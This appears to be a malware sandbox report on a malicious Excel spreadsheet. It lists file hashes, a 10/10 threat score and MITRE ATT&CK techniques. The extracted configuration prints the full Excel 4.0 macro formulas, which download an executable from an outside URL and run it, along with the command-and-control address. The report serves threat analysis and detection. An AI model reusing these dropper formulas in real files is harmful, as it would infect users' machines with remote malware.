Overview

overview

10

Static

static

10

eebfd0a510...e2.xls

windows7-x64

10

eebfd0a510...e2.xls

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    9ec8d5bc205fded2bf9508f7194f88f4.bin

  • Size

    43KB

  • Sample

    230627-cadzkscg38

  • MD5

    1e10e7e5b61684e6c2ba1140e249e6da

  • SHA1

    8e47469ab3939d51a0d84e639dbc2fb2d090bbab

  • SHA256

    af1f2422d6f244a032e6cf188215ffe4cdbc980597deeee8f417ef6f549da2c8

  • SHA512

    44394e9769d8b0b997d0b94be8ba80c29ab175d4228836636d400937f4ce6fa84e6ed99cfcca9d7ec1e78f1c2f36ff9df71e714fc82514f5eceeaa1dc737dab5

  • SSDEEP

    768:66nK92tehkZr3ZNHpgn2X9Xmv/gePzAUhD/q4QNrTgC0ZXzLI8Y5W:bK9z4XJgn2X5mvxbDArTg5XHI8CW

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0) =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0) =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0) =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0) =HALT()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Targets

    • Target

      eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2.xlsx

    • Size

      94KB

    • MD5

      9ec8d5bc205fded2bf9508f7194f88f4

    • SHA1

      7009deb529f2d4355727f73bf586f02415c2f492

    • SHA256

      eebfd0a510f5cf27e40b16f9e74f23f50a24b43a8d370eb6244ace00b53e69e2

    • SHA512

      37bf6ca2d80d6124f5dae24ce2b6c6944dfde623593111d31f964ce3fc452ff1cc7e4ceb9c294b78b28c4f7a4c994aa5ef9eed8db9863bf7268fd2c5fbfa778c

    • SSDEEP

      1536:YveZ+RwPONXoRjDhIcp0fDlaGGx+cL26nA0VSNcd52CibTXVNpity5pgKejDzGYK:Y2Z+RwPONXoRjDhIcp0fDlaGGx+cL26G

    Score
    10/10
    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Tasks